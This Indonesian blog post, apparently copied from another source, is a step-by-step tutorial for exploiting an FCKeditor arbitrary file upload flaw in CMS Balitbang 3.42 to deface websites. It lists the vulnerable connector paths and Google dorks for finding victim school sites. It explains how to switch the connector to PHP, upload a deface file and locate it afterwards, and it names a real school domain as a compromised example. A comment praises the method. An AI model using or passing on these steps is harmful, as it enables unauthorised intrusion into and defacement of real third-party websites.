Filename | CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads |
Permission | rw-r--r-- |
Author | Inveet.id |
Date and Time | 03.50 |
Label | Exploit |
Action |
[-] CMS Balitbang 3.42 Fckeditor Arbitrary File Uploads
[-] Exploit :
http://public_html/dir/editor/filemanager/connectors/uploadtest.html
http://public_html/dir/editor/filemanager/connectors/test.html
http://public_html/dir/editor/filemanager/browser/default/browser.html
[-]Dork :
inurl:/html/siswa.php?
inurl:/html/alumni.php?
inurl:/html/guru.php?
Pertama , Kita Cari Target digoogle dengan memasukan dork diatas .
tersera kalian mau coba dork yg mana .
kemudian pilih salah satu site dari google tadi :
Example : http://www.smkmuh7gdl-malang.sch.id
Langkah selanjutnya , kita masukan Exploit di Target Tersebut :
Example : http://www.smkmuh7gdl-malang.sch.id/editor/filemanager/connectors/test.html
sekarang , setelah masuk
Ganti Connector ASP → PHP
Lalu , Upload File txt kamu ,
oh iya , file HTML gak bisa lo , hanya file TXT yang bisa
setelah upload , dimana tempatnya file kita tadi ?
itu mudah , langsung saja masukan
http://public_html/userfiles/file/file-deface.txt
http://public_html/userfiles/file-deface.txt
dan ini hasil saya tadi
http://www.smkmuh7gdl-malang.sch.id/userfiles/file/test.txt
sekian copasan saya , silakan berexplorasi sendiri ya
1 komentar:
wah ada namaku :)
mantapkang tutorialnya boleh dicoba ini :)
Posting Komentar